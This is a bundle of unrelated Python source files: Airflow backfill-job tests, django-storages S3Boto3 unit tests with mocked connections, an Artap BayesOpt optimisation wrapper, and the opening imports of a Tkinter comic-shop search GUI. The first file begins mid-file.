'test_backfill_fill_blanks',
) as dag:
op1 = DummyOperator(task_id='op1')
op2 = DummyOperator(task_id='op2')
op3 = DummyOperator(task_id='op3')
op4 = DummyOperator(task_id='op4')
op5 = DummyOperator(task_id='op5')
op6 = DummyOperator(task_id='op6')
dr = dag_maker.create_dagrun()
executor = MockExecutor()
session = settings.Session()
tis = dr.get_task_instances()
for ti in tis:
if ti.task_id == op1.task_id:
ti.state = State.UP_FOR_RETRY
ti.end_date = DEFAULT_DATE
elif ti.task_id == op2.task_id:
ti.state = State.FAILED
elif ti.task_id == op3.task_id:
ti.state = State.SKIPPED
elif ti.task_id == op4.task_id:
ti.state = State.SCHEDULED
elif ti.task_id == op5.task_id:
ti.state = State.UPSTREAM_FAILED
# op6 = None
session.merge(ti)
session.commit()
session.close()
job = BackfillJob(dag=dag, start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, executor=executor)
with pytest.raises(AirflowException, match='Some task instances failed'):
job.run()
dr.refresh_from_db()
assert dr.state == State.FAILED
tis = dr.get_task_instances()
for ti in tis:
if ti.task_id in (op1.task_id, op4.task_id, op6.task_id):
assert ti.state == State.SUCCESS
elif ti.task_id == op2.task_id:
assert ti.state == State.FAILED
elif ti.task_id == op3.task_id:
assert ti.state == State.SKIPPED
elif ti.task_id == op5.task_id:
assert ti.state == State.UPSTREAM_FAILED
def test_backfill_execute_subdag(self):
dag = self.dagbag.get_dag('example_subdag_operator')
subdag_op_task = dag.get_task('section-1')
subdag = subdag_op_task.subdag
subdag.timetable = cron_timetable('@daily')
start_date = timezone.utcnow()
executor = MockExecutor()
job = BackfillJob(
dag=subdag, start_date=start_date, end_date=start_date, executor=executor, donot_pickle=True
)
job.run()
subdag_op_task.pre_execute(context={'execution_date': start_date})
subdag_op_task.execute(context={'execution_date': start_date})
subdag_op_task.post_execute(context={'execution_date': start_date})
history = executor.history
subdag_history = history[0]
# check that all 5 task instances of the subdag 'section-1' were executed
assert 5 == len(subdag_history)
for sdh in subdag_history:
ti = sdh[3]
assert 'section-1-task-' in ti.task_id
with create_session() as session:
successful_subdag_runs = (
session.query(DagRun)
.filter(DagRun.dag_id == subdag.dag_id)
.filter(DagRun.execution_date == start_date)
.filter(DagRun.state == State.SUCCESS)
.count()
)
assert 1 == successful_subdag_runs
subdag.clear()
dag.clear()
def test_subdag_clear_parentdag_downstream_clear(self):
dag = self.dagbag.get_dag('clear_subdag_test_dag')
subdag_op_task = dag.get_task('daily_job')
subdag = subdag_op_task.subdag
executor = MockExecutor()
job = BackfillJob(
dag=dag, start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, executor=executor, donot_pickle=True
)
with timeout(seconds=30):
job.run()
ti_subdag = TI(task=dag.get_task('daily_job'), execution_date=DEFAULT_DATE)
ti_subdag.refresh_from_db()
assert ti_subdag.state == State.SUCCESS
ti_irrelevant = TI(task=dag.get_task('daily_job_irrelevant'), execution_date=DEFAULT_DATE)
ti_irrelevant.refresh_from_db()
assert ti_irrelevant.state == State.SUCCESS
ti_downstream = TI(task=dag.get_task('daily_job_downstream'), execution_date=DEFAULT_DATE)
ti_downstream.refresh_from_db()
assert ti_downstream.state == State.SUCCESS
sdag = subdag.partial_subset(
task_ids_or_regex='daily_job_subdag_task', include_downstream=True, include_upstream=False
)
sdag.clear(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, include_parentdag=True)
ti_subdag.refresh_from_db()
assert State.NONE == ti_subdag.state
ti_irrelevant.refresh_from_db()
assert State.SUCCESS == ti_irrelevant.state
ti_downstream.refresh_from_db()
assert State.NONE == ti_downstream.state
subdag.clear()
dag.clear()
def test_backfill_execute_subdag_with_removed_task(self):
"""
Ensure that subdag operators execute properly in the case where
an associated task of the subdag has been removed from the dag
definition, but has instances in the database from previous runs.
"""
dag = self.dagbag.get_dag('example_subdag_operator')
subdag = dag.get_task('section-1').subdag
session = settings.Session()
executor = MockExecutor()
job = BackfillJob(
dag=subdag, start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, executor=executor, donot_pickle=True
)
dr = DagRun(
dag_id=subdag.dag_id, execution_date=DEFAULT_DATE, run_id="test", run_type=DagRunType.BACKFILL_JOB
)
session.add(dr)
removed_task_ti = TI(
task=DummyOperator(task_id='removed_task'), run_id=dr.run_id, state=State.REMOVED
)
removed_task_ti.dag_id = subdag.dag_id
dr.task_instances.append(removed_task_ti)
session.commit()
with timeout(seconds=30):
job.run()
for task in subdag.tasks:
instance = (
session.query(TI)
.filter(
TI.dag_id == subdag.dag_id, TI.task_id == task.task_id, TI.execution_date == DEFAULT_DATE
)
.first()
)
assert instance is not None
assert instance.state == State.SUCCESS
removed_task_ti.refresh_from_db()
assert removed_task_ti.state == State.REMOVED
subdag.clear()
dag.clear()
def test_update_counters(self, dag_maker, session):
with dag_maker(dag_id='test_manage_executor_state', start_date=DEFAULT_DATE, session=session) as dag:
task1 = DummyOperator(task_id='dummy', owner='airflow')
dr = dag_maker.create_dagrun()
job = BackfillJob(dag=dag)
ti = TI(task1, dr.execution_date)
ti.refresh_from_db()
ti_status = BackfillJob._DagRunTaskStatus()
# test for success
ti.set_state(State.SUCCESS, session)
ti_status.running[ti.key] = ti
job._update_counters(ti_status=ti_status, session=session)
assert len(ti_status.running) == 0
assert len(ti_status.succeeded) == 1
assert len(ti_status.skipped) == 0
assert len(ti_status.failed) == 0
assert len(ti_status.to_run) == 0
ti_status.succeeded.clear()
# test for skipped
ti.set_state(State.SKIPPED, session)
ti_status.running[ti.key] = ti
job._update_counters(ti_status=ti_status, session=session)
assert len(ti_status.running) == 0
assert len(ti_status.succeeded) == 0
assert len(ti_status.skipped) == 1
assert len(ti_status.failed) == 0
assert len(ti_status.to_run) == 0
ti_status.skipped.clear()
# test for failed
ti.set_state(State.FAILED, session)
ti_status.running[ti.key] = ti
job._update_counters(ti_status=ti_status, session=session)
assert len(ti_status.running) == 0
assert len(ti_status.succeeded) == 0
assert len(ti_status.skipped) == 0
assert len(ti_status.failed) == 1
assert len(ti_status.to_run) == 0
ti_status.failed.clear()
# test for retry
ti.set_state(State.UP_FOR_RETRY, session)
ti_status.running[ti.key] = ti
job._update_counters(ti_status=ti_status, session=session)
assert len(ti_status.running) == 0
assert len(ti_status.succeeded) == 0
assert len(ti_status.skipped) == 0
assert len(ti_status.failed) == 0
assert len(ti_status.to_run) == 1
ti_status.to_run.clear()
# test for reschedule
# For rescheduled state, tests that reduced_key is not
# used by upping try_number.
ti._try_number = 2
ti.set_state(State.UP_FOR_RESCHEDULE, session)
assert ti.try_number == 3 # see ti.try_number property in taskinstance module
ti_status.running[ti.key] = ti
job._update_counters(ti_status=ti_status, session=session)
assert len(ti_status.running) == 0
assert len(ti_status.succeeded) == 0
assert len(ti_status.skipped) == 0
assert len(ti_status.failed) == 0
assert len(ti_status.to_run) == 1
ti_status.to_run.clear()
# test for none
ti.set_state(State.NONE, session)
# Setting ti._try_number = 0 brings us to ti.try_number==1
# so that the reduced_key access will work fine
ti._try_number = 0
assert ti.try_number == 1 # see ti.try_number property in taskinstance module
session.merge(ti)
session.commit()
ti_status.running[ti.key] = ti
job._update_counters(ti_status=ti_status, session=session)
assert len(ti_status.running) == 0
assert len(ti_status.succeeded) == 0
assert len(ti_status.skipped) == 0
assert len(ti_status.failed) == 0
assert len(ti_status.to_run) == 1
ti_status.to_run.clear()
session.close()
def test_dag_dagrun_infos_between(self, dag_maker):
with dag_maker(
dag_id='dagrun_infos_between', start_date=DEFAULT_DATE, schedule_interval="@hourly"
) as test_dag:
DummyOperator(
task_id='dummy',
owner='airflow',
)
assert [DEFAULT_DATE] == [
info.logical_date
for info in test_dag.iter_dagrun_infos_between(
earliest=DEFAULT_DATE,
latest=DEFAULT_DATE,
)
]
assert [
DEFAULT_DATE - datetime.timedelta(hours=3),
DEFAULT_DATE - datetime.timedelta(hours=2),
DEFAULT_DATE - datetime.timedelta(hours=1),
DEFAULT_DATE,
] == [
info.logical_date
for info in test_dag.iter_dagrun_infos_between(
earliest=DEFAULT_DATE - datetime.timedelta(hours=3),
latest=DEFAULT_DATE,
)
]
def test_backfill_run_backwards(self):
dag = self.dagbag.get_dag("test_start_date_scheduling")
dag.clear()
executor = MockExecutor(parallelism=16)
job = BackfillJob(
executor=executor,
dag=dag,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=1),
run_backwards=True,
)
job.run()
session = settings.Session()
tis = (
session.query(TI)
.join(TI.dag_run)
.filter(TI.dag_id == 'test_start_date_scheduling' and TI.task_id == 'dummy')
.order_by(DagRun.execution_date)
.all()
)
queued_times = [ti.queued_dttm for ti in tis]
assert queued_times == sorted(queued_times, reverse=True)
assert all(ti.state == State.SUCCESS for ti in tis)
dag.clear()
session.close()
def test_reset_orphaned_tasks_with_orphans(self, dag_maker):
"""Create dagruns and ensure only ones with correct states are reset."""
prefix = 'backfill_job_test_test_reset_orphaned_tasks'
states = [State.QUEUED, State.SCHEDULED, State.NONE, State.RUNNING, State.SUCCESS]
states_to_reset = [State.QUEUED, State.SCHEDULED, State.NONE]
tasks = []
with dag_maker(dag_id=prefix) as dag:
for i in range(len(states)):
task_id = f"{prefix}_task_{i}"
task = DummyOperator(task_id=task_id)
tasks.append(task)
session = settings.Session()
job = BackfillJob(dag=dag)
# create dagruns
dr1 = dag_maker.create_dagrun()
dr2 = dag.create_dagrun(run_id='test2', state=State.SUCCESS)
# create taskinstances and set states
dr1_tis = []
dr2_tis = []
for i, (task, state) in enumerate(zip(tasks, states)):
ti1 = TI(task, dr1.execution_date)
ti2 = TI(task, dr2.execution_date)
ti1.refresh_from_db()
ti2.refresh_from_db()
ti1.state = state
ti2.state = state
dr1_tis.append(ti1)
dr2_tis.append(ti2)
session.merge(ti1)
session.merge(ti2)
session.commit()
assert 2 == job.reset_state_for_orphaned_tasks()
for ti in dr1_tis + dr2_tis:
ti.refresh_from_db()
# running dagrun should be reset
for state, ti in zip(states, dr1_tis):
if state in states_to_reset:
assert ti.state is None
else:
assert state == ti.state
# otherwise not
for state, ti in zip(states, dr2_tis):
assert state == ti.state
for state, ti in zip(states, dr1_tis):
ti.state = state
session.commit()
job.reset_state_for_orphaned_tasks(filter_by_dag_run=dr1, session=session)
# check same for dag_run version
for state, ti in zip(states, dr2_tis):
assert state == ti.state
def test_reset_orphaned_tasks_specified_dagrun(self, session, dag_maker):
"""Try to reset when we specify a dagrun and ensure nothing else is."""
dag_id = 'test_reset_orphaned_tasks_specified_dagrun'
task_id = dag_id + '_task'
with dag_maker(
dag_id=dag_id,
start_date=DEFAULT_DATE,
schedule_interval='@daily',
session=session,
) as dag:
DummyOperator(task_id=task_id, dag=dag)
job = BackfillJob(dag=dag)
# make two dagruns, only reset for one
dr1 = dag_maker.create_dagrun(state=State.SUCCESS)
dr2 = dag.create_dagrun(run_id='test2', state=State.RUNNING, session=session)
ti1 = dr1.get_task_instances(session=session)[0]
ti2 = dr2.get_task_instances(session=session)[0]
ti1.state = State.SCHEDULED
ti2.state = State.SCHEDULED
session.merge(ti1)
session.merge(ti2)
session.merge(dr1)
session.merge(dr2)
session.flush()
num_reset_tis = job.reset_state_for_orphaned_tasks(filter_by_dag_run=dr2, session=session)
assert 1 == num_reset_tis
ti1.refresh_from_db(session=session)
ti2.refresh_from_db(session=session)
assert State.SCHEDULED == ti1.state
assert State.NONE == ti2.state
def test_job_id_is_assigned_to_dag_run(self, dag_maker):
dag_id = 'test_job_id_is_assigned_to_dag_run'
with dag_maker(dag_id=dag_id, start_date=DEFAULT_DATE, schedule_interval='@daily') as dag:
DummyOperator(task_id="dummy_task", dag=dag)
job = BackfillJob(
dag=dag, executor=MockExecutor(), start_date=datetime.datetime.now() - datetime.timedelta(days=1)
)
job.run()
dr: DagRun = dag.get_last_dagrun()
assert dr.creating_job_id == job.id
def test_backfill_has_job_id(self):
"""Make sure that backfill jobs are assigned job_ids."""
dag = self.dagbag.get_dag("test_start_date_scheduling")
dag.clear()
executor = MockExecutor(parallelism=16)
job = BackfillJob(
executor=executor,
dag=dag,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=1),
run_backwards=True,
)
job.run()
assert executor.job_id is not None
@pytest.mark.long_running
@pytest.mark.parametrize("executor_name", ["SequentialExecutor", "DebugExecutor"])
@pytest.mark.parametrize("dag_id", ["test_mapped_classic", "test_mapped_taskflow"])
def test_mapped_dag(self, dag_id, executor_name):
"""
End-to-end test of a simple mapped dag.
We test with multiple executors as they have different "execution environments" -- for instance
DebugExecutor runs a lot more in the same process than other Executors.
"""
# This test needs a real executor to run, so that the `make_list` task can write out the TaskMap
from airflow.executors.executor_loader import ExecutorLoader
self.dagbag.process_file(str(TEST_DAGS_FOLDER / f'{dag_id}.py'))
dag = self.dagbag.get_dag(dag_id)
job = BackfillJob(
dag=dag,
start_date=days_ago(1),
end_date=days_ago(1),
donot_pickle=True,
executor=ExecutorLoader.load_executor(executor_name),
)
job.run()
|
test_s3boto3.py
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
import gzip
import threading
from datetime import datetime
from unittest import skipIf
from botocore.exceptions import ClientError
from django.conf import settings
from django.core.files.base import ContentFile
from django.test import TestCase
from django.utils.six.moves.urllib import parse as urlparse
from django.utils.timezone import is_aware, utc
from storages.backends import s3boto3
try:
from unittest import mock
except ImportError: # Python 3.2 and below
import mock
class S3Boto3TestCase(TestCase):
def setUp(self):
self.storage = s3boto3.S3Boto3Storage()
self.storage._connections.connection = mock.MagicMock()
class S3Boto3StorageTests(S3Boto3TestCase):
def test_clean_name(self):
"""
Test the base case of _clean_name
"""
path = self.storage._clean_name("path/to/somewhere")
self.assertEqual(path, "path/to/somewhere")
def test_clean_name_normalize(self):
"""
Test the normalization of _clean_name
"""
path = self.storage._clean_name("path/to/../somewhere")
self.assertEqual(path, "path/somewhere")
def test_clean_name_trailing_slash(self):
"""
Test the _clean_name when the path has a trailing slash
"""
path = self.storage._clean_name("path/to/somewhere/")
self.assertEqual(path, "path/to/somewhere/")
def test_clean_name_windows(self):
"""
Test the _clean_name when the path has a trailing slash
"""
path = self.storage._clean_name("path\\to\\somewhere")
self.assertEqual(path, "path/to/somewhere")
def test_storage_url_slashes(self):
"""
Test URL generation.
"""
self.storage.custom_domain = 'example.com'
# We expect no leading slashes in the path,
# and trailing slashes should be preserved.
self.assertEqual(self.storage.url(''), 'https://example.com/')
self.assertEqual(self.storage.url('path'), 'https://example.com/path')
self.assertEqual(self.storage.url('path/'), 'https://example.com/path/')
self.assertEqual(self.storage.url('path/1'), 'https://example.com/path/1')
self.assertEqual(self.storage.url('path/1/'), 'https://example.com/path/1/')
def test_storage_save(self):
"""
Test saving a file
"""
name = 'test_storage_save.txt'
content = ContentFile('new content')
self.storage.save(name, content)
self.storage.bucket.Object.assert_called_once_with(name)
obj = self.storage.bucket.Object.return_value
obj.upload_fileobj.assert_called_with(
content.file,
ExtraArgs={
'ContentType': 'text/plain',
'ACL': self.storage.default_acl,
}
)
def test_content_type(self):
"""
Test saving a file with a None content type.
"""
name = 'test_image.jpg'
content = ContentFile('data')
content.content_type = None
self.storage.save(name, content)
self.storage.bucket.Object.assert_called_once_with(name)
obj = self.storage.bucket.Object.return_value
obj.upload_fileobj.assert_called_with(
content.file,
ExtraArgs={
'ContentType': 'image/jpeg',
'ACL': self.storage.default_acl,
}
)
def test_storage_save_gzipped(self):
"""
Test saving a gzipped file
"""
name = 'test_storage_save.gz'
content = ContentFile("I am gzip'd")
self.storage.save(name, content)
obj = self.storage.bucket.Object.return_value
obj.upload_fileobj.assert_called_with(
content.file,
ExtraArgs={
'ContentType': 'application/octet-stream',
'ContentEncoding': 'gzip',
'ACL': self.storage.default_acl,
}
)
def test_storage_save_gzip(self):
"""
Test saving a file with gzip enabled.
"""
self.storage.gzip = True
name = 'test_storage_save.css'
content = ContentFile("I should be gzip'd")
self.storage.save(name, content)
obj = self.storage.bucket.Object.return_value
obj.upload_fileobj.assert_called_with(
mock.ANY,
ExtraArgs={
'ContentType': 'text/css',
'ContentEncoding': 'gzip',
'ACL': self.storage.default_acl,
}
)
args, kwargs = obj.upload_fileobj.call_args
content = args[0]
zfile = gzip.GzipFile(mode='rb', fileobj=content)
self.assertEqual(zfile.read(), b"I should be gzip'd")
def test_storage_save_gzip_twice(self):
"""
Test saving the same file content twice with gzip enabled.
"""
# Given
self.storage.gzip = True
name = 'test_storage_save.css'
content = ContentFile("I should be gzip'd")
# When
self.storage.save(name, content)
self.storage.save('test_storage_save_2.css', content)
# Then
obj = self.storage.bucket.Object.return_value
obj.upload_fileobj.assert_called_with(
mock.ANY,
ExtraArgs={
'ContentType': 'text/css',
'ContentEncoding': 'gzip',
'ACL': self.storage.default_acl,
}
)
args, kwargs = obj.upload_fileobj.call_args
content = args[0]
zfile = gzip.GzipFile(mode='rb', fileobj=content)
self.assertEqual(zfile.read(), b"I should be gzip'd")
def test_compress_content_len(self):
"""
Test that file returned by _compress_content() is readable.
"""
self.storage.gzip = True
content = ContentFile("I should be gzip'd")
content = self.storage._compress_content(content)
self.assertTrue(len(content.read()) > 0)
def test_storage_open_write(self):
"""
Test opening a file in write mode
"""
name = 'test_open_for_writïng.txt'
content = 'new content'
# Set the encryption flag used for multipart uploads
self.storage.encryption = True
self.storage.reduced_redundancy = True
self.storage.default_acl = 'public-read'
file = self.storage.open(name, 'w')
self.storage.bucket.Object.assert_called_with(name)
obj = self.storage.bucket.Object.return_value
# Set the name of the mock object
obj.key = name
file.write(content)
obj.initiate_multipart_upload.assert_called_with(
ACL='public-read',
ContentType='text/plain',
ServerSideEncryption='AES256',
StorageClass='REDUCED_REDUNDANCY'
)
# Save the internal file before closing
multipart = obj.initiate_multipart_upload.return_value
multipart.parts.all.return_value = [mock.MagicMock(e_tag='123', part_number=1)]
file.close()
multipart.Part.assert_called_with(1)
part = multipart.Part.return_value
part.upload.assert_called_with(Body=content.encode('utf-8'))
multipart.complete.assert_called_once_with(
MultipartUpload={'Parts': [{'ETag': '123', 'PartNumber': 1}]})
def test_auto_creating_bucket(self):
self.storage.auto_create_bucket = True
Bucket = mock.MagicMock()
self.storage._connections.connection.Bucket.return_value = Bucket
self.storage._connections.connection.meta.client.meta.region_name = 'sa-east-1'
Bucket.meta.client.head_bucket.side_effect = ClientError({'Error': {},
'ResponseMetadata': {'HTTPStatusCode': 404}},
'head_bucket')
self.storage._get_or_create_bucket('testbucketname')
Bucket.create.assert_called_once_with(
ACL='public-read',
CreateBucketConfiguration={
'LocationConstraint': 'sa-east-1',
}
)
def test_storage_exists(self):
self.assertTrue(self.storage.exists("file.txt"))
self.storage.connection.meta.client.head_object.assert_called_with(
Bucket=self.storage.bucket_name,
Key="file.txt",
)
def test_storage_exists_false(self):
self.storage.connection.meta.client.head_object.side_effect = ClientError(
{'Error': {'Code': '404', 'Message': 'Not Found'}},
'HeadObject',
)
self.assertFalse(self.storage.exists("file.txt"))
self.storage.connection.meta.client.head_object.assert_called_with(
Bucket=self.storage.bucket_name,
Key='file.txt',
)
def test_storage_exists_doesnt_create_bucket(self):
with mock.patch.object(self.storage, '_get_or_create_bucket') as method:
self.storage.exists('file.txt')
method.assert_not_called()
def test_storage_delete(self):
self.storage.delete("path/to/file.txt")
self.storage.bucket.Object.assert_called_with('path/to/file.txt')
self.storage.bucket.Object.return_value.delete.assert_called_with()
def test_storage_listdir_base(self):
file_names = ["some/path/1.txt", "2.txt", "other/path/3.txt", "4.txt"]
result = []
for p in file_names:
obj = mock.MagicMock()
obj.key = p
result.append(obj)
self.storage.bucket.objects.filter.return_value = iter(result)
dirs, files = self.storage.listdir("")
self.storage.bucket.objects.filter.assert_called_with(Prefix="")
self.assertEqual(len(dirs), 2)
for directory in ["some", "other"]:
self.assertTrue(directory in dirs,
""" "%s" not in directory list "%s".""" % (
directory, dirs))
self.assertEqual(len(files), 2)
for filename in ["2.txt", "4.txt"]:
self.assertTrue(filename in files,
""" "%s" not in file list "%s".""" % (
filename, files))
def test_storage_listdir_subdir(self):
file_names = ["some/path/1.txt", "some/2.txt"]
result = []
for p in file_names:
obj = mock.MagicMock()
obj.key = p
result.append(obj)
self.storage.bucket.objects.filter.return_value = iter(result)
dirs, files = self.storage.listdir("some/")
self.storage.bucket.objects.filter.assert_called_with(Prefix="some/")
self.assertEqual(len(dirs), 1)
self.assertTrue('path' in dirs,
""" "path" not in directory list "%s".""" % (dirs,))
self.assertEqual(len(files), 1)
self.assertTrue('2.txt' in files,
""" "2.txt" not in files list "%s".""" % (files,))
def test_storage_size(self):
obj = self.storage.bucket.Object.return_value
obj.content_length = 4098
name = 'file.txt'
self.assertEqual(self.storage.size(name), obj.content_length)
def test_storage_mtime(self):
# Test both USE_TZ cases
for use_tz in (True, False):
with self.settings(USE_TZ=use_tz):
self._test_storage_mtime(use_tz)
def _test_storage_mtime(self, use_tz):
obj = self.storage.bucket.Object.return_value
obj.last_modified = datetime.now(utc)
name = 'file.txt'
self.assertFalse(
is_aware(self.storage.modified_time(name)),
'Naive datetime object expected from modified_time()'
)
self.assertIs(
settings.USE_TZ,
is_aware(self.storage.get_modified_time(name)),
'%s datetime object expected from get_modified_time() when USE_TZ=%s' % (
('Naive', 'Aware')[settings.USE_TZ],
settings.USE_TZ
)
)
def test_storage_url(self):
name = 'test_storage_size.txt'
url = 'http://aws.amazon.com/%s' % name
self.storage.bucket.meta.client.generate_presigned_url.return_value = url
self.storage.bucket.name = 'bucket'
self.assertEqual(self.storage.url(name), url)
self.storage.bucket.meta.client.generate_presigned_url.assert_called_with(
'get_object',
Params={'Bucket': self.storage.bucket.name, 'Key': name},
ExpiresIn=self.storage.querystring_expire
)
custom_expire = 123
self.assertEqual(self.storage.url(name, expire=custom_expire), url)
self.storage.bucket.meta.client.generate_presigned_url.assert_called_with(
'get_object',
Params={'Bucket': self.storage.bucket.name, 'Key': name},
ExpiresIn=custom_expire
)
def test_generated_url_is_encoded(self):
self.storage.custom_domain = "mock.cloudfront.net"
filename = "whacky & filename.mp4"
url = self.storage.url(filename)
parsed_url = urlparse.urlparse(url)
self.assertEqual(parsed_url.path,
"/whacky%20%26%20filename.mp4")
self.assertFalse(self.storage.bucket.meta.client.generate_presigned_url.called)
def test_special_characters(self):
self.storage.custom_domain = "mock.cloudfront.net"
name = "ãlöhâ.jpg"
content = ContentFile('new content')
self.storage.save(name, content)
self.storage.bucket.Object.assert_called_once_with(name)
url = self.storage.url(name)
parsed_url = urlparse.urlparse(url)
self.assertEqual(parsed_url.path, "/%C3%A3l%C3%B6h%C3%A2.jpg")
def test_strip_signing_parameters(self):
expected = 'http://bucket.s3-aws-region.amazonaws.com/foo/bar'
self.assertEqual(self.storage._strip_signing_parameters(
'%s?X-Amz-Date=12345678&X-Amz-Signature=Signature' % expected), expected)
self.assertEqual(self.storage._strip_signing_parameters(
'%s?expires=12345678&signature=Signature' % expected), expected)
@skipIf(threading is None, 'Test requires threading')
def test_connection_threading(self):
connections = []
def thread_storage_connection():
connections.append(self.storage.connection)
for x in range(2):
t = threading.Thread(target=thread_storage_connection)
t.start()
t.join()
# Connection for each thread needs to be unique
self.assertIsNot(connections[0], connections[1])
|
algorithm_bayesopt.py
|
from .problem import Problem
from .algorithm import Algorithm
from .config import artap_root
import time
import numpy as np
import os
import sys
sys.path.append(artap_root + os.sep + "lib" + os.sep)
import bayesopt
from multiprocessing import Process, Pipe, Queue, Manager
# from multiprocessing.managers import BaseManager
_l_type = ['L_FIXED', 'L_EMPIRICAL', 'L_DISCRETE', 'L_MCMC', 'L_ERROR']
_sc_type = ['SC_MTL', 'SC_ML', 'SC_MAP', 'SC_LOOCV', 'SC_ERROR']
_surr_name = ["sGaussianProcess", "sGaussianProcessML", "sGaussianProcessNormal", "sStudentTProcessJef", "sStudentTProcessNIG"]
# Python module to get run BayesOpt library in a OO pattern.
# The objective module should inherit this one and override evaluateSample.
class BayesOptContinuous(object):
# Let's define the vector.
#
# For different options: see vector.h and vector.cpp .
# If a parameter is not defined, it will be automatically set
# to a default value.
def __init__(self, n_dim):
## Library vector
self.params = {}
## n dimensions
self.n_dim = n_dim
## Lower bounds
self.lb = np.zeros((self.n_dim,))
## Upper bounds
self.ub = np.ones((self.n_dim,))
@property
def parameters(self):
return self.params
@parameters.setter
def parameters(self, params):
self.params = params
@property
def lower_bound(self):
return self.lb
@lower_bound.setter
def lower_bound(self, lb):
self.lb = lb
@property
def upper_bound(self):
return self.ub
@upper_bound.setter
def upper_bound(self, ub):
self.ub = ub
## Function for testing.
# It should be overriden.
def evaluateSample(self, x_in):
raise NotImplementedError("Please Implement this method")
## Main function. Starts the optimization process.
def optimize(self):
min_val, x_out, error = bayesopt.optimize(self.evaluateSample, self.n_dim,
self.lb, self.ub,
self.params)
return min_val, x_out, error
class BayesOpt(Algorithm):
""" BayesOpt algorithms """
def __init__(self, problem: Problem, name="BayesOpt"):
super().__init__(problem, name)
self.problem = problem
self.options.declare(name='l_type', default='L_EMPIRICAL', values=_l_type,
desc='Type of learning for the kernel params')
self.options.declare(name='sc_type', default='SC_MAP', values=_sc_type,
desc='Type of learning for the kernel params')
self.options.declare(name='n_iterations', default=50, lower=1,
desc='Maximum BayesOpt evaluations')
self.options.declare(name='init_method', default=1,
desc='Init method') # 1-LHS, 2-Sobol
self.options.declare(name='n_init_samples', default=10, lower=1,
desc='Number of samples before optimization')
self.options.declare(name='n_iter_relearn', default=10, lower=1,
desc='Number of samples before relearn kernel')
self.options.declare(name='surr_name', default='sGaussianProcessML', values=_surr_name,
desc='Name of the surrogate function')
self.options.declare(name='surr_noise', default=1e-10, lower=0.0,
desc='Variance of observation noise')
class BayesOptClassSerial(BayesOptContinuous):
def __init__(self, algorithm):
n = len(algorithm.problem.parameters)
super().__init__(n)
# algorithm
self.algorithm = algorithm
# Size design variables.
self.lb = np.empty((n,))
self.ub = np.empty((n,))
self.params = {}
def evaluateSample(self, x):
return self.algorithm.evaluator.evaluate_scalar(x)
class BayesOptSerial(BayesOpt):
""" BayesOpt algorithms """
def __init__(self, problem: Problem, name="BayesOpt"):
super().__init__(problem, name)
self.bo = BayesOptClassSerial(self)
def run(self):
# Figure out bounds vectors.
i = 0
for parameter in self.problem.parameters:
bounds = parameter['bounds']
self.bo.lb[i] = bounds[0]
self.bo.ub[i] = bounds[1]
i += 1
# set bayesopt
self.bo.params['n_iterations'] = self.options['n_iterations']
self.bo.params['n_init_samples'] = self.options['n_init_samples']
self.bo.params['n_iter_relearn'] = self.options['n_iter_relearn']
self.bo.params['surr_name'] = self.options['surr_name']
self.bo.params['surr_noise'] = self.options['surr_noise']
self.bo.params['init_method'] = self.options['init_method']
self.bo.params['l_type'] = self.options['l_type']
self.bo.params['sc_type'] = self.options['sc_type']
self.bo.params['verbose_level'] = self.options['verbose_level']
t_s = time.time()
self.problem.logger.info("BayesOpt: surr_name{}".format(self.options['surr_name']))
mvalue, x_out, error = self.bo.optimize()
t = time.time() - t_s
self.problem.logger.info("BayesOpt: elapsed time: {} s".format(t))
# sync changed individual informations
self.problem.data_store.sync_all()
if error != 0:
print('Optimization FAILED.')
print("Error", error)
print('-' * 35)
else:
pass
# print('Optimization Complete, %f seconds' % (clock() - start))
# print("Result", x_out, mvalue)
# print('-' * 35)
class BayesOptClassParallel(Process, BayesOptContinuous):
def __init__(self, pipe, algorithm):
n = len(algorithm.problem.parameters)
Process.__init__(self)
BayesOptContinuous.__init__(self, n)
# algorithm
self.algorithm = algorithm
# output
self.mvalue = -1.0
self.x_out = -1.0
self.error = 0
self.pipe = pipe
# Size design variables.
self.lb = np.empty((n,))
self.ub = np.empty((n,))
self.params = {}
def run(self):
mvalue, x_out, error = self.optimize()
self.pipe.send('STOP')
# set output values
self.mvalue = mvalue
self.x_out = x_out
self.error = error
# output
print("output")
print(self.mvalue)
print(self.x_out)
print(self.error)
def evaluateSample(self, x):
self.pipe.send(x)
result = self.pipe.recv()
return result
class BayesOptParallel(BayesOpt):
""" BayesOpt algorithms """
def __init__(self, problem: Problem, name="BayesOpt"):
super().__init__(problem, name)
self.pipe_par, self.pipe_child = Pipe()
self.bo = BayesOptClassParallel(self.pipe_child, self)
def worker(self, pipe):
x = None
while True:
x = pipe.recv()
if str(x) == 'STOP':
break
result = self.bo.job.evaluate_scalar(x)
pipe.send(result)
def run(self):
# Figure out bounds vectors.
i = 0
for parameter in self.problem.parameters:
bounds = parameter['bounds']
self.bo.lb[i] = bounds[0]
self.bo.ub[i] = bounds[1]
i += 1
# set bayesopt
self.bo.params['n_iterations'] = self.options['n_iterations']
self.bo.params['n_init_samples'] = self.options['n_init_samples']
self.bo.params['n_iter_relearn'] = self.options['n_iter_relearn']
self.bo.params['surr_name'] = self.options['surr_name']
self.bo.params['surr_noise'] = self.options['surr_noise']
self.bo.params['init_method'] = self.options['init_method']
self.bo.params['l_type'] = self.options['l_type']
self.bo.params['sc_type'] = self.options['sc_type']
self.bo.params['verbose_level'] = self.options['verbose_level']
# process = Process(target=self.worker, args=(self.pipe_par, self.problem, ))
process = Process(target=self.worker, args=(self.pipe_par, ))
self.bo.start()
process.start()
self.bo.join()
process.join()
print(self.bo.mvalue)
print(self.bo.x_out)
print(self.bo.error)
print()
print(self.problem.data_store, len(self.problem.populations[-1].individuals))
# self.result = self.mvalue
"""
if self.bo.error != 0:
print('Optimization FAILED.')
print("Error", self.bo.error)
print('-' * 35)
else:
print('Optimization Complete, %f seconds' % (clock() - start))
print("Result", self.bo.x_out, self.bo.mvalue)
print('-' * 35)
"""
|
oz_cs_gui.py
|
"""
GUI Version of Oz_comic_search
SCRIPT TO SEARCH ALL AUSTRALIAN COMIC BOOK SHOPS with online stores
Simply input search terms and get Title | Price | Link for all shops
"""
from tkinter import * # FOR GUI
from tkinter import ttk
from PIL import ImageTk,Image
